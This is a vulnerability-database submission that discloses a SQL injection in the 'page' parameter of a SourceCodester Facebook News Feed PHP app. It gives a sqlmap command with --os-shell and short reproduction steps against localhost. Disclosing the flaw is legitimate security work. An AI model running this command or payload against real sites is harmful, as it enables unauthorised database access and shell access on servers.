Submit #344502: SourceCodester facebook 1.0 SQL Injectioninfo

TitleSourceCodester facebook 1.0 SQL Injection
Description# Exploit Title: Facebook News Feed - SQL Injection # Exploit Author: Raj # Vendor Name: oretnom23 # Vendor Homepage: https://www.sourcecodester.com/php/14602/facebook-news-feed-using-phpmysqli-source-code.html # Software Link: https://www.sourcecodester.com/php/14602/facebook-news-feed-using-phpmysqli-source-code.html # Version: v1.0 # Tested on: Windows 11, Apache Description:- A SQL Injection issue in Facebook News Feed allows to get an complete Remote Access into the website. Access such as database, files and everything. ` Payload used:- python sqlmap.py -u "http://localhost:8080/fb/index.php?page=home" --risk 2 --level 3 --os-shell ` Vulnerable Parameter:- ?page= ` Steps to reproduce:- 1. Here we take the GET method of "http://localhost:8080/fb/index.php?page=home" just this page only 2. In this we target our parameter as "page". 3. Now we are gonna use "SQLMap" tool and with this following command **python sqlmap.py -u "http://localhost:8080/fb/index.php?page=home" --risk 2 --level 3 --os-shell**
User
 Cyberraj (UID 59481)
Submission05/25/2024 15:08 (11 months ago)
Moderation05/25/2024 20:25 (5 hours later)
StatusAccepted
VulDB Entry266302 [SourceCodester Facebook News Feed Like 1.0 index.php page sql injection]
Points17

Are you interested in using VulDB?

Download the whitepaper to learn more about our service!